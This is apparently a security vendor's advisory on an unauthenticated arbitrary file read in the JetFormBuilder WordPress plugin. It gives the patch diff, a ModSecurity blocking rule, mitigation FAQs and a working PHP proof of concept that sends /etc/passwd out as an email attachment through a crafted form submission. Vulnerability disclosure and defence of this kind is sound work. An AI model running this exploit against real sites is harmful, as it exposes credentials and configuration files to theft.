What is CVE -2026-4373?

CVE-2026-4373 is a high-severity vulnerability in the JetFormBuilder plugin for WordPress, allowing unauthenticated attackers to read arbitrary files from the server. This occurs due to insufficient validation of user-supplied file paths in the Media Field functionality.

How does the vulnerability work?

The vulnerability allows attackers to exploit the ‘Uploaded_File::set_from_array’ method, which accepts file paths from a JSON payload without proper validation. An attacker can submit a crafted form request to exfiltrate sensitive files by using path traversal sequences.

Who is affected by this vulnerability?

All installations of the JetFormBuilder plugin up to and including version 3.5.6.2 are affected. Administrators should check their plugin version in the WordPress dashboard to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin panel and look for the JetFormBuilder plugin. If the version is 3.5.6.2 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

The vulnerability is patched in JetFormBuilder version 3.5.6.3. Updating to this version or later will mitigate the risk. Ensure that you regularly check for updates to all plugins to maintain security.

What does a CVSS score of 7.5 mean?

A CVSS score of 7.5 indicates a high severity vulnerability, suggesting that it poses a significant risk to confidentiality. This means that successful exploitation could lead to unauthorized access to sensitive information on the server.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability could allow attackers to read sensitive files such as configuration files or password files, leading to further attacks like site takeover or server compromise. It is crucial to address this vulnerability promptly.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can craft a malicious form submission that includes a path traversal payload to read sensitive files. The example shows how to send a request that could exfiltrate the contents of ‘/etc/passwd’ via email.

What steps should I take if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the JetFormBuilder plugin until it can be updated. Additionally, review your server’s file permissions and access controls to limit potential exposure.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, regularly update all plugins and themes, conduct security audits, and use security plugins that monitor for vulnerabilities. Educate your team about secure coding practices if you develop custom plugins.

Where can I find more information about CVE-2026-4373?

More information about CVE-2026-4373 can be found on the official CVE database, security advisories from WordPress, and the JetFormBuilder plugin’s changelog. Staying informed about vulnerabilities is key to maintaining security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 23, 2026

CVE-2026-4373: JetFormBuilder <= 3.5.6.2 – Unauthenticated Arbitrary File Read via Media Field (jetformbuilder)

CVE ID CVE-2026-4373

Plugin jetformbuilder

Severity High (CVSS 7.5)

CWE 36

Vulnerable Version 3.5.6.2

Patched Version 3.5.6.3

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4373:
This vulnerability is an unauthenticated arbitrary file read in the JetFormBuilder WordPress plugin. The flaw resides in the Media Field preset functionality, allowing attackers to exfiltrate arbitrary local files as email attachments. The CVSS score of 7.5 reflects a high-severity confidentiality impact.

Atomic Edge research identifies the root cause as a combination of two insecure code paths. The `Uploaded_File::set_from_array` method in `jetformbuilder/includes/classes/resources/uploaded-file.php` directly accepted a user-supplied `file` path from a JSON payload without validation. The `File_Tools::is_same_file` method in `jetformbuilder/includes/classes/resources/file-tools.php` performed an insufficient check, comparing only file basenames. This allowed path traversal payloads to bypass the intended same-file verification.

Exploitation requires a form configured with a Media Field and a Send Email action that attaches files. An attacker submits a crafted form request containing a preset JSON payload. This payload includes a `file` parameter with a path traversal sequence pointing to a sensitive local file, such as `/etc/passwd` or `wp-config.php`. When the form processes the request, the plugin attaches the specified file to an outgoing email, enabling exfiltration.

The patch introduces a new `normalize_allowed_upload_file_path` static method in the `Uploaded_File` class. This method normalizes the file path, resolves symlinks via `realpath`, and validates that the resulting absolute path resides within the WordPress uploads directory. The patch also updates `set_from_array` and `get_attachment_file` to call this sanitizer. The `is_same_file` method now uses the sanitized `get_attachment_file` path for comparison. The `Send_Email_Action` class adds a `filter_safe_attachments` method that applies the same validation to all email attachments.

Successful exploitation leads to full local file disclosure. Attackers can read any file readable by the web server process, including WordPress configuration files, sensitive operating system files, and database credentials. This data exposure can facilitate further attacks, such as site takeover or server compromise.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/jetformbuilder/includes/blocks/render/media-field-render.php
+++ b/jetformbuilder/includes/blocks/render/media-field-render.php
@@ -75,7 +75,7 @@
 			// preset field
 			$updated = str_replace( '<!-- field -->', $this->get_field_preset( $file ), $updated );

-			$image_ext    = array( 'jpg', 'jpeg', 'jpe', 'gif', 'png', 'svg', 'webp' );
+			$image_ext    = array( 'jpg', 'jpeg', 'jpe', 'gif', 'png', 'svg', 'webp', 'avif' );
 			$img_ext_preg = '!.(' . join( '|', $image_ext ) . ')$!i';

 			if ( preg_match( $img_ext_preg, $file['url'] ) ) {
--- a/jetformbuilder/includes/classes/resources/file-tools.php
+++ b/jetformbuilder/includes/classes/resources/file-tools.php
@@ -30,7 +30,13 @@
 	}

 	protected static function is_same_file( File $file, Uploaded_File $uploaded_file ): bool {
-		$info = pathinfo( $uploaded_file->get_url() );
+		$preset_path = $uploaded_file->get_attachment_file();
+
+		if ( ! $preset_path ) {
+			return false;
+		}
+
+		$info = pathinfo( $preset_path );

 		return $file->get_name() === ( $info['basename'] ?? '' );
 	}
--- a/jetformbuilder/includes/classes/resources/uploaded-file.php
+++ b/jetformbuilder/includes/classes/resources/uploaded-file.php
@@ -96,17 +96,17 @@

 	public function set_from_array( array $upload ): Uploaded_File {
 		if ( isset( $upload['file'] ) ) {
-			$this->file = $upload['file'];
+			$this->file = self::normalize_allowed_upload_file_path( (string) $upload['file'] );
 		}
 		if ( isset( $upload['url'] ) ) {
-			$this->url = $upload['url'];
+			$this->url = esc_url_raw( (string) $upload['url'] );
 		}
 		if ( isset( $upload['type'] ) ) {
-			$this->type = $upload['type'];
+			$this->type = sanitize_mime_type( (string) $upload['type'] );
 		}
 		if ( isset( $upload['id'] ) ) {

-			$this->set_attachment_id( (string) $upload['id'] );
+			$this->set_attachment_id( (string) absint( $upload['id'] ) );
 		}

 		return $this;
@@ -185,7 +185,10 @@
 		$file = $this->get_file();

 		if ( $file ) {
-			return $file;
+			$file = self::normalize_allowed_upload_file_path( $file );
+			if ( $file ) {
+				return $file;
+			}
 		}

 		$id  = $this->get_attachment_id();
@@ -197,13 +200,59 @@

 		$file = get_attached_file( $id );

-		return is_string( $file ) ? $file : '';
+		if ( ! is_string( $file ) ) {
+			return '';
+		}
+
+		return self::normalize_allowed_upload_file_path( $file );
 	}

 	/**
 	 * @param string $url
 	 */
 	public function set_url( string $url ) {
-		$this->url = $url;
+		$this->url = esc_url_raw( $url );
+	}
+
+	/**
+	 * Normalize path and allow only existing files inside wp-content uploads directory.
+	 *
+	 * @return string Normalized realpath to a file in uploads, or empty string.
+	 */
+	public static function normalize_allowed_upload_file_path( string $file ): string {
+		if ( '' === $file ) {
+			return '';
+		}
+
+		$path = wp_normalize_path( $file );
+		$real = realpath( $path );
+
+		if ( false === $real ) {
+			return '';
+		}
+
+		$real = wp_normalize_path( $real );
+		$real = untrailingslashit( $real );
+
+		$uploads = wp_get_upload_dir();
+		$base    = (string) ( $uploads['basedir'] ?? '' );
+
+		if ( '' === $base ) {
+			return '';
+		}
+
+		$base_real = realpath( $base );
+		if ( false === $base_real ) {
+			return '';
+		}
+
+		$base = wp_normalize_path( $base_real );
+		$base = untrailingslashit( $base );
+
+		if ( 0 === strpos( $real, $base . '/' ) && is_file( $real ) ) {
+			return $real;
+		}
+
+		return '';
 	}
 }
--- a/jetformbuilder/jet-form-builder.php
+++ b/jetformbuilder/jet-form-builder.php
@@ -3,7 +3,7 @@
  * Plugin Name:         JetFormBuilder
  * Plugin URI:          https://jetformbuilder.com/
  * Description:         Advanced form builder plugin for WordPress block editor. Create forms from the ground up, customize the existing ones, and style them up – all in one editor.
- * Version:             3.5.6.2
+ * Version:             3.5.6.3
  * Author:              Crocoblock
  * Author URI:          https://crocoblock.com/
  * Text Domain:         jet-form-builder
@@ -18,7 +18,7 @@
 	die();
 }

-const JET_FORM_BUILDER_VERSION = '3.5.6.2';
+const JET_FORM_BUILDER_VERSION = '3.5.6.3';

 const JET_FORM_BUILDER__FILE__ = __FILE__;
 const JET_FORM_BUILDER_SITE    = 'https://jetformbuilder.com';
--- a/jetformbuilder/modules/actions-v2/send-email/send-email-action.php
+++ b/jetformbuilder/modules/actions-v2/send-email/send-email-action.php
@@ -5,6 +5,7 @@
 use Jet_Form_BuilderActionsAction_Handler;
 use Jet_Form_BuilderActionsTypesBase;
 use Jet_Form_BuilderClassesHttpHttp_Tools;
+use Jet_Form_BuilderClassesResourcesUploaded_File;
 use Jet_Form_BuilderClassesTools;
 use Jet_Form_BuilderExceptionsAction_Exception;
 use Jet_Form_BuilderRequestRequest_Tools;
@@ -397,7 +398,29 @@
 			);
 		}

-		return $attachments;
+		return $this->filter_safe_attachments( $attachments );
+	}
+
+	/**
+	 * Allow only readable files within the uploads directory.
+	 */
+	private function filter_safe_attachments( array $attachments ): array {
+		$safe = array();
+
+		foreach ( $attachments as $attachment ) {
+			if ( ! is_string( $attachment ) || '' === $attachment ) {
+				continue;
+			}
+
+			$allowed = Uploaded_File::normalize_allowed_upload_file_path( $attachment );
+			if ( '' === $allowed || ! is_file( $allowed ) || ! is_readable( $allowed ) ) {
+				continue;
+			}
+
+			$safe[] = $allowed;
+		}
+
+		return array_values( array_unique( $safe ) );
 	}

 	public function update_headers() {
--- a/jetformbuilder/modules/form-record/admin/meta-boxes/form-record-values-box.php
+++ b/jetformbuilder/modules/form-record/admin/meta-boxes/form-record-values-box.php
@@ -37,15 +37,19 @@
 	}

 	public function get_columns(): array {
-		return array(
-			'form'       => new Form_Link_Column(),
-			'referrer'   => new Referrer_Link_Column(),
-			'status'     => new Status_Column(),
-			'user'       => new User_Login_Column(),
-			'ip_address' => new Ip_Address_Column(),
-			'user_agent' => new User_Agent_Column(),
-			'created_at' => new Created_At_Column(),
-			'updated_at' => new Updated_At_Column(),
+		return apply_filters(
+			'jet-form-builder/form-record/general-values-columns',
+			array(
+				'form'       => new Form_Link_Column(),
+				'referrer'   => new Referrer_Link_Column(),
+				'status'     => new Status_Column(),
+				'user'       => new User_Login_Column(),
+				'ip_address' => new Ip_Address_Column(),
+				'user_agent' => new User_Agent_Column(),
+				'created_at' => new Created_At_Column(),
+				'updated_at' => new Updated_At_Column(),
+			),
+			$this
 		);
 	}

--- a/jetformbuilder/vendor/composer/installed.php
+++ b/jetformbuilder/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => 'crocoblock/jetformbuilder',
         'pretty_version' => 'dev-main',
         'version' => 'dev-main',
-        'reference' => 'df7eef93139074f35204bd3ed0fc03d3d263e22a',
+        'reference' => '21e39eda416b2024c54d26fb7dc33550a16f8069',
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -13,7 +13,7 @@
         'crocoblock/jetformbuilder' => array(
             'pretty_version' => 'dev-main',
             'version' => 'dev-main',
-            'reference' => 'df7eef93139074f35204bd3ed0fc03d3d263e22a',
+            'reference' => '21e39eda416b2024c54d26fb7dc33550a16f8069',
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-4373
# This rule blocks exploitation of the JetFormBuilder Media Field arbitrary file read.
# It matches the specific AJAX action and the 'file' parameter containing path traversal.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:10004373,phase:2,deny,status:403,chain,msg:'CVE-2026-4373 JetFormBuilder Arbitrary File Read via Media Field',severity:'CRITICAL',tag:'CVE-2026-4373',tag:'WordPress',tag:'JetFormBuilder'"
  SecRule ARGS_POST:action "@streq jet_fb_forms_send" "chain"
    SecRule ARGS_POST "@rx ^(?:[^=]+=)?(?:{[^}]*"file"s*:s*"|"file"s*:s*")(?!/wp-content/uploads/)" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,capture,ctl:auditLogParts=+E"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4373 - JetFormBuilder <= 3.5.6.2 - Unauthenticated Arbitrary File Read via Media Field
<?php

$target_url = 'https://example.com/wp-admin/admin-ajax.php';

// The form ID and field name must be known or discovered.
$form_id = 1;
$media_field_name = 'media_field';

// The file to exfiltrate via email attachment.
$target_file = '/etc/passwd';

// Craft the JSON preset payload for the Media Field.
// The 'file' parameter uses an absolute path traversal.
$preset_payload = json_encode([
    'file' => $target_file,
    'url' => 'file://' . $target_file,
    'type' => 'text/plain',
    'id' => ''
]);

// Build the form submission data.
// The action triggers the form processing.
$post_data = [
    'action' => 'jet_fb_forms_send',
    'form_id' => $form_id,
    // The field data includes the malicious preset.
    $media_field_name => $preset_payload
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// The plugin does not require authentication or a nonce for this action in vulnerable versions.
$response = curl_exec($ch);
curl_close($ch);

echo "Response: " . $response . "n";
// If the form is configured to send an email with the file attached, the target file will be included.
// This script demonstrates the request; email delivery must be verified separately.

?>

Frequently Asked Questions

What is CVE-2026-4373?
Understanding the vulnerability
CVE-2026-4373 is a high-severity vulnerability in the JetFormBuilder plugin for WordPress, allowing unauthenticated attackers to read arbitrary files from the server. This occurs due to insufficient validation of user-supplied file paths in the Media Field functionality.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to exploit the ‘Uploaded_File::set_from_array’ method, which accepts file paths from a JSON payload without proper validation. An attacker can submit a crafted form request to exfiltrate sensitive files by using path traversal sequences.
Who is affected by this vulnerability?
Identifying vulnerable installations
All installations of the JetFormBuilder plugin up to and including version 3.5.6.2 are affected. Administrators should check their plugin version in the WordPress dashboard to determine if they are at risk.
How can I check if my site is vulnerable?
Version verification steps
To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin panel and look for the JetFormBuilder plugin. If the version is 3.5.6.2 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in JetFormBuilder version 3.5.6.3. Updating to this version or later will mitigate the risk. Ensure that you regularly check for updates to all plugins to maintain security.
What does a CVSS score of 7.5 mean?
Understanding severity levels
A CVSS score of 7.5 indicates a high severity vulnerability, suggesting that it poses a significant risk to confidentiality. This means that successful exploitation could lead to unauthorized access to sensitive information on the server.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability could allow attackers to read sensitive files such as configuration files or password files, leading to further attacks like site takeover or server compromise. It is crucial to address this vulnerability promptly.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can craft a malicious form submission that includes a path traversal payload to read sensitive files. The example shows how to send a request that could exfiltrate the contents of ‘/etc/passwd’ via email.
What steps should I take if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the JetFormBuilder plugin until it can be updated. Additionally, review your server’s file permissions and access controls to limit potential exposure.
How can I prevent similar vulnerabilities in the future?
Best practices for WordPress security
To prevent similar vulnerabilities, regularly update all plugins and themes, conduct security audits, and use security plugins that monitor for vulnerabilities. Educate your team about secure coding practices if you develop custom plugins.
Where can I find more information about CVE-2026-4373?
Resources for further reading
More information about CVE-2026-4373 can be found on the official CVE database, security advisories from WordPress, and the JetFormBuilder plugin’s changelog. Staying informed about vulnerabilities is key to maintaining security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations